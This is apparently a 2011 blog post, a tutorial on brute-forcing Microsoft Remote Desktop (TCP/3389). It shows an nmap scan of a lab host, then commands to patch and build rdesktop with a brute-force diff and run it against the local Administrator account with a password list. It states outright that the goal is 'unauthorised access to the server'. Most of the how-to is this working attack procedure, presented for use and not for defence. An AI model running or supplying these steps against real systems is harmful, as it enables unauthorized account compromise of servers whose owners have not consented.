Brute force MS Remote Terminal Service

7 09 2011

When we see TCP/3389, normally, it is Microsoft Remote Terminal Service. If it is not, make sure you are not lured to HoneyPot. OK, let’s make it more certain!

D:\>nmap -n -PN -sS -sV 192.168.58.140 -p 3389
Interesting ports on 192.168.58.140:
PORT STATE SERVICE VERSION
3389/tcp open ms-term-serv?
MAC Address: 00:0C:29:61:DD:93 (VMware)

So what!

Basically, vulnerability assessment might evaluate it as a low, or sometimes, medium risk. However, you should bare in mind that the server you turned this service on could be compromised by brute force attack.

Lockout mechanism could help, but local Administrator is not normally kept locked after many failed logon attempts. Thus, we have got the way to get an unauthorised access to the server with
remote desktop service.

How to

1. You need to have rdesktop and its patch. After trying, I think that rdesktop-1.4.1.tar.gz and rdp-brute-force-r422.diff were my answers because there was no patch for newer version and some of which were not stable.

2. Unpack rdesktop(don’t install at this time) and move its patch into the same directory. Then run this command to update rdesktop.
patch -p1 -i rdp-brute-force-r422.diff

3. Install rdesktop.

./configure
make
make install

4. It is about time!
./rdesktop -u Administrator -p dict.txt 192.168.58.140

The successful rate depends on the strength of your password list file. I recommend you to read a brief and practical shot for John the ripper from carnal0wnage.


Actions

Information

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s




%d bloggers like this: